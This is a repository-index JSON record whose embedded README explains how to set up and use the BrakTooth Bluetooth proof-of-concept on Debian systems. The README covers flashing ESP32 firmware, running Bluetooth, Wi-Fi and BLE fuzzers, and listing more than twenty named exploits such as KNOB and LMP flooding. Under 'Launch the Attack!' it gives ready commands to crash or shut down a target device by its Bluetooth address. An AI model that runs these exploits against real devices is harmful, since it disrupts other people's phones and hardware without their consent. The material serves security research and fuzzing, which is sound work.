{"id":26901961,"url":"https://github.com/malwarekid/braktooth-kali-linux","last_synced_at":"2025-04-01T09:08:58.828Z","repository":{"id":204482447,"uuid":"711942484","full_name":"malwarekid/BrakTooth-Kali-Linux","owner":"malwarekid","description":null,"archived":false,"fork":false,"pushed_at":"2024-04-11T04:05:20.000Z","size":17,"stargazers_count":4,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2024-04-11T05:48:47.526Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/malwarekid.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2023-10-30T13:38:44.000Z","updated_at":"2024-04-11T05:48:47.526Z","dependencies_parsed_at":"2023-11-13T02:26:48.318Z","dependency_job_id":"61a43504-ee25-424c-a9a4-156157dcf0bb","html_url":"https://github.com/malwarekid/BrakTooth-Kali-Linux","commit_stats":null,"previous_names":["itzcloudyy/braktooth-kali-linux","scriptkiddieeee/braktooth-kali-linux","malwarekid/braktooth-kali-linux"],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/malwarekid%2FBrakTooth-Kali-Linux/manifests","owner_url":"https://repos.ecosy
ste.ms/api/v1/hosts/GitHub/owners/malwarekid","download_url":"https://codeload.github.com/malwarekid/BrakTooth-Kali-Linux/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246612479,"owners_count":20805355,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-04-01T09:08:58.205Z","updated_at":"2025-04-01T09:08:58.813Z","avatar_url":"https://github.com/malwarekid.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\n# BrakTooth Proof of Concept\n\n\n## 1) Requirements\n\n[**BrakTooth**](https://www.braktooth.com/) requires a specific BT hardware development kit (**ESP-WROVER-KIT**) to be able to launch the attack, since LMP packets cannot be sent from the host on normal Bluetooth hardware.\n\n* ##### **Made for all Debian-based distros** \n\n* ##### Hardware Board: **ESP-WROVER-KIT or ESP32 and ESP-Prog**\n\n## 2) Installation Instructions\n\n##### A) Install (flash) PoC firmware on ESP-WROVER-KIT\n\nFirst, connect the **ESP32-WROVER-KIT** to your PC. You can check whether two serial ports were added by running `ls /dev/ttyUSB*`. Normally, the **ESP32-WROVER-KIT** adds two serial ports, such as `/dev/ttyUSB0` and `/dev/ttyUSB1`. We want the second serial port, which is used for serial communication with the **ESP32**.\n\n```bash\nsudo apt install unzip python3-dev\nsudo bash braktooth/wdissector/libs.sh\nunzip esp32driver.zip # Extract esp32driver.zip (firmware package)\npython3 release/firmware.py flash /dev/ttyUSB1 # Change the serial port to match your ESP32 device.\n# You may need to press and hold the \"Boot\" button during the flashing process.\ncd ../\n```\n\n##### B) Extract wdissector package and install system requirements\n\n```bash\ncd wdissector\n# Installs python3, nodejs and system packages using apt-get and fixes all libs\nsudo bash requirements.sh\n```\n\n\n\n## 3) Running BT fuzzer\n\nYou can start the fuzzer as follows:\n\n```bash\nsudo bin/bt_fuzzer --scan # Scan for targets (BDAddress) for 15 seconds\nsudo bin/bt_fuzzer # Start fuzzer with graphical user interface (GUI)\nsudo bin/bt_fuzzer --no-gui --autostart --target=E8:D0:3C:94:2C:66  # Start fuzzer without GUI  \n```\n\n#### BT Command line options\n\n```bash\nsudo bin/bt_fuzzer --help\nBluetooth Classic Fuzzer (Baseband, LMP, L2CAP, etc)\nUsage:\n  BT Fuzzer [OPTION...]\n\n      --help               Print help\n      --default-config     Start with default config\n      --autostart          Automatically start (default: true)\n      --no-gui             Start without GUI\n      --test-webview       Test GUI webview performance (requires internet)\n      --live-capture       Open wireshark in live capture mode\n      --exploit [=arg(=)]  Exploit Name\n      --list-exploits      List all exploits\n      --host arg           Host BDAddress\n      --host-port arg      Host serial port name of BT Interface \n                           (ESP-WROVER-KIT)\n      --random_bdaddress   Enable/Disable host BDAddress randomization\n      --target arg         Target BDAddress (default: /dev/ttyUSB1)\n      --target-port arg    Target serial port name to detect crashes \n                           (default: /dev/ttyUSB2)\n      --target-baud arg    Target baud rate (default: 115200)\n      --bounding           Enable/Disable Bounding (default: true)\n      --iocap arg          IO Capabilities (default: 3)\n      --authreq arg        Authentication Request flag (default: 3)\n      --scan               Scan BT Targets\n```\n\n\n\n## 3.1) Running Experimental Fuzzers\n\n#### Wi-Fi AP Fuzzer\n\nThe Wi-Fi AP fuzzer requires the [Alfa AWUS036AC Wi-Fi dongle](https://www.amazon.com/Alfa-Long-Range-Dual-Band-Wireless-External/dp/B00MX57AO4/ref=sr_1_5?crid=3PN2VX74493Y3\u0026keywords=AWUS036AC\u0026qid=1643284766\u0026sprefix=alpha+awus036ac%2Caps%2C310\u0026sr=8-5) and installation of our custom driver for it:\n`cd src/drivers/wifi/rtl8812au \u0026\u0026 make -j4`. Then, the Wi-Fi AP fuzzer will load the custom driver on program startup:\n\n```bash\nsudo bin/wifi_ap_fuzzer # Start fuzzer without graphical interface\n```\n\n* Wi-Fi options such as SSID, password, authentication and channel can be changed in `configs/wifi_ap_config.json`. \n* Note that the parameter `WifiInterface` must match your dongle interface name, which is usually **wlan1**. \n* By default, the fuzzer runs its main thread on the core defined by the parameter `MainThreadCore=2`. Make sure to change this parameter value if you prefer to run the fuzzer on a different core.\n* Logs are saved in folder `logs/wifi_ap`\n\n##### Wi-Fi AP Command line options\n\n```bash\nWi-Fi AP 802.11 Fuzzer (MAC, LLC, SNAP, EAPoL, etc)\nUsage:\n  Wi-Fi AP Fuzzer [OPTION...]\n\n      --help               Print help\n      --default-config     Start with default config\n      --autostart          Automatically start (default: true)\n      --exploit [=arg(=)]  Exploit Name\n      --fuzz               Enable/Disable fuzzing (default: true)\n```\n\n\n\n#### BLE Host Fuzzer\n\nThe BLE Host fuzzer uses the same ESP32 development kit and can be run via the command:\n\n```bash\nsudo bin/bthost_fuzzer # Start fuzzer without graphical interface\n```\n\n* Logs are saved in folder `logs/BTHost`\n\n\n\n## 4) BT Exploits Usage Instructions\n\n**Note: For now, \u003cu\u003eNon-compliance\u003c/u\u003e tests may not work for any BT device. We will improve the non-compliance scripts to validate generic BT devices as well as include more details on such tests during the upcoming weeks.**\n\n\n\n### List Exploits\n\nBT Exploiter has several exploits, which can be listed by running the following command:\n\n```bash\nsudo bin/bt_exploiter --list-exploits # Run as root\n\nAvailable Exploits:\n--\u003e 'invalid_timing_accuracy'\n--\u003e 'repeated_host_connection'\n--\u003e 'sdp_unkown_element_type'\n--\u003e 'knob'\n--\u003e 'au_rand_flooding'\n--\u003e 'lmp_max_slot_overflow'\n--\u003e 'duplicated_encapsulated_payload'\n--\u003e 'feature_response_flooding'\n--\u003e 'lmp_overflow_dm1'\n--\u003e 'invalid_feature_page_execution'\n--\u003e 'feature_req_ping_pong'\n--\u003e 'truncated_sco_link_request'\n--\u003e 'paging_scan_disable'\n--\u003e 'invalid_max_slot'\n--\u003e 'truncated_lmp_accepted'\n--\u003e 'invalid_setup_complete'\n--\u003e 'duplicated_iocap'\n--\u003e 'lmp_auto_rate_overflow'\n--\u003e 'lmp_overflow_2dh1'\n--\u003e 'noncompliance_invalid_stop_encryption'\n--\u003e 'wrong_encapsulated_payload'\n--\u003e 'noncomplicance_duplicated_encryption_request'\n--\u003e 'sdp_oversized_element_size'\n```\n\n\n\n### Scan target\n\nBefore launching the attack, you need to know the `BDAddress` of the target BT device. To facilitate this, BT Exploiter can scan for the `BDAddress` of nearby targets by running the following command:\n\n```bash\nsudo bin/bt_exploiter --scan\n```\n\nIf the **ESP32** is detected by bt_exploiter and scanning works, then you should get output similar to the figure below.\n\n![](./docs/scan_output.png)\n\n\n\n### Launch the Attack!\n\nNow it is your turn! Choose an exploit by its name and remember the target `BDAddress` against which the exploit needs to be launched. You need to specify both the name of the exploit and the target `BDAddress` as follows to launch the respective attack:\n\n```bash\nsudo bin/bt_exploiter --host-port=/dev/ttyUSB1 --target=\u003ctarget bdaddress\u003e --exploit=\u003cexploit name\u003e\n```\n\nThe argument `--target` is your target `BDAddress` and `--host-port` must match the correct ESP32-WROVER-KIT serial port.\n\nFor example, launching the exploit for **LMP AU Rand Flooding** (au_rand_flooding) can be accomplished as follows:\n\n```bash\nsudo bin/bt_exploiter --host-port=/dev/ttyUSB1 --target=a4:50:46:59:0c:90 --exploit=au_rand_flooding\n```\n\nIf the target is vulnerable, then you should observe some anomalous behavior from the target (shutdown, reboot, etc.) or simply no longer be able to discover it when scanning for BT targets again. \n\n**An example of a successful attack output for a vulnerable target that shuts down after the attack is presented below.**\n\n\u003cimg src=\"./docs/example_attack.png\" style=\"zoom:50%;\" /\u003e\n\n\n\n### Modify Exploits (Tutorial)\n\nThe source code of all exploits (C/C++) is included in folder **`modules/exploits`**. Any change to an existing exploit, or any new file that you add in this folder, will be automatically identified and compiled the next time you run `bt_fuzzer` or `bt_exploiter`. \n\nFor more details on how to create BT exploits, please read **`exploit_modules_tutorial.pdf`**, included in this repository.\n\n\n\n### Opening the capture files in Wireshark\n\nThe exploit tool includes a standalone version of **Wireshark** which already includes a plugin to read the customized captures saved by our tool.\n\nCapture files are automatically saved to `logs/Bluetooth/capture_bluetooth.pcapng`. To open it via the custom Wireshark, run the following in the root folder of the exploiter (the **bin** folder must be present in your working directory):\n\n```bash\n./bin/wireshark logs/Bluetooth/capture_bluetooth.pcapng\n```\n\nYou should see the following if the capture file was generated correctly:\n\n*(Screenshot of the capture opened in Wireshark)*\n\n\n\n### Advanced BT Options\n\nThe exploiter BT options are loaded from `configs/bt_config.json` from the following attributes:\n\n```json\n{\n    \"config\": {\n        \"Bluetooth\": {\n            // BT Options\n            \"EnableBounding\": true,\n            \"AuthReq\": 4,        \n            \"DisableRoleSwitch\": true,\n            \"IOCap\": 3,\n            \"Pin\": \"0000\",\n            \"TargetBDAddress\": \"E0:D4:E8:19:C7:69\",\n            // TODO: Store a list of targets\n            \"TargetBDAddressList\": [  \n                \"24:0A:C4:61:1C:1A\",\n                \"E0:D4:E8:19:C7:69\"\n            ]\n            // ...\n     }\n  // ...\n}\n```\n\n- **Save Captures** - When this option is enabled, the capture file is saved to `logs/Bluetooth/capture_bluetooth.pcapng`\n\n- **Scan** - Scan for BT targets\n\n- **BT Program** - Programs or \"Profiles\" which connect to a target device or wait for a connection. The available BT programs are listed in the table below:\n\n  | BT Program           | Connection Type    | PROFILE      |\n  | -------------------- | ------------------ | ------------ |\n  | bin/sdp_rfcomm_query | Initiator / Master | SDP / RFCOMM |\n\n- **Target BDADDR** - Target device to connect to. Only applies to BT programs which **initiate** the connection. It is not applied for programs that wait for connections, such as `bin/spp_counter` or `bin/a2dp_sink_demo`.\n\n\n### Security Options\n\n- **Enable Bounding** - Enables BT pairing. If disabled, then all the following options have no effect.\n- **Disable Role Switch** (Checkbox) - Forces the connection to reject any attempt to perform role switching. This ensures that once the master connects to a slave, their roles stay the same during the session. Exploits such as KNOB require this for the master (being the fuzzer) to mutate the `LMP_max_encryption_key_size_req` packet. **Disable this option if the slave does not accept the connection without role switching.**\n- **IO Capabilities** - Selects the IO capabilities of the fuzzer during the pairing process according to the following:\n  - Display Only = 0\n  - Display Yes No = 1\n  - Keyboard Only = 2\n  - No Input No Output = 3 (Default)\n  - Unknown = 256\n- **Auth. Requirements** - Flag which indicates the authentication parameters during the pairing process.\n  - No MitM, No Bonding = 0\n  - MitM, No Bonding = 1\n  - No MitM, Dedicated Bonding = 2\n  - MitM, Dedicated Bonding = 3\n  - No MitM, General Bonding = 4\n  - MitM, General Bonding = 5\n- **PIN** - 4-digit PIN to be used during pairing (legacy pairing method).\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmalwarekid%2Fbraktooth-kali-linux/lists"}